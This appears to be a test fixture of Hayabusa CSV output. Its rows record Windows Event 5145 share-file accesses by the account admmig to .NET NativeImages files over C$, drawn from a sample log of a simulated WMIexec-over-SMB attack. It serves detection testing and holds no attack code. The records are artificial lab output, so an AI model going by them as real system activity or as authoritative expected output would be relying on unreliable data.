+2021-04-22 20:32:30.678 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt0d283adf#\32aee6654d81a07e698f9ee18c886a2a  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.694 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt19c51595#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.694 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt19c51595#\65e679add728957b62f4bbba59d88386  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.725 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt73a1fc9d#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.725 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt73a1fc9d#\3e17b0be5e7a03853d44d996d366e88b  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.741 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt93d54979#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.741 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt93d54979#\2abf386e286ec43711933fbe3e652014  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.756 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt9064068c#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.756 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt9064068c#\6ef9bbadb5c7087da45798a762683eeb  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.756 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runtc259d85b#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.756 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runtc259d85b#\ed68489987b413410ccb94c6e704f6b4  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.772 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\183eaaded316165bfbd32a991e4e8c8a  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Security  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Security\ba6ea4732f569e0674d6a43a82de5cc2  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14b62006#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14b62006#\09e0258d6e4a9d467c32dc8ac58766f2  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv30e99c02#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv30e99c02#\c97638c574cae07911907fa19e2aeedd  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.803 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv43e0ae6e#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.819 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv43e0ae6e#\e9302436a2c607db888bcb3b14ebba8e  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.834 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv759bfb78#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.834 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv759bfb78#\5e015d37aa3fdc75648e9d00d44d13ac  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.850 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14259fd9#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.866 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14259fd9#\3c06d012b88601107a4449fb04067a20  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.882 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servae423458#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.882 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servae423458#\67f143e1f5d81dae33879b84e0035cad  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servb00a6512#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servb00a6512#\03d76bf2a39a57e8bed74e782c62fd1c  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servd1dec626#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servd1dec626#\ee53227bcc4430088d0b560752c1cd02  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servf73e6522#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servf73e6522#\39bc23d9592ef276c70a36ef0311070a  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.ServiceModel  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.ServiceModel\4c3126aec3364546e4ade89c24c4e742  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Speech  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Speech\6d5f82d8178e3d8e9931e70dce584863  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Transactions  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Transactions\95c749867e5f72a09ed1e59a57931301  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web\90285827b1300835ca1aaff1dff83a01  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8da3333a#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8da3333a#\3dde15282321aa41c609dc7f7a5f1af5  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8dc504e4#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8dc504e4#\61d489d8a768782ce394f299dcc0e4bb  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.9c7998a9#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.9c7998a9#\f2c2cff3fa34c990079298396b1ec1fc  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.000 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.28b9ef5a#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.000 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.28b9ef5a#\4b7763786015950c44dbba0ff26b883e  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.016 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.82d5542b#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.016 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.82d5542b#\af89139de3b87146c705fa989eeaa4b1  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.188dd00b#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.188dd00b#\db42d61826797328b8b368348c6b3f13  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.063 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.1586a486#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.063 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.1586a486#\9de316f43fe18621a13deefe7dbbbc27  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.078 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.2486c0f5#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
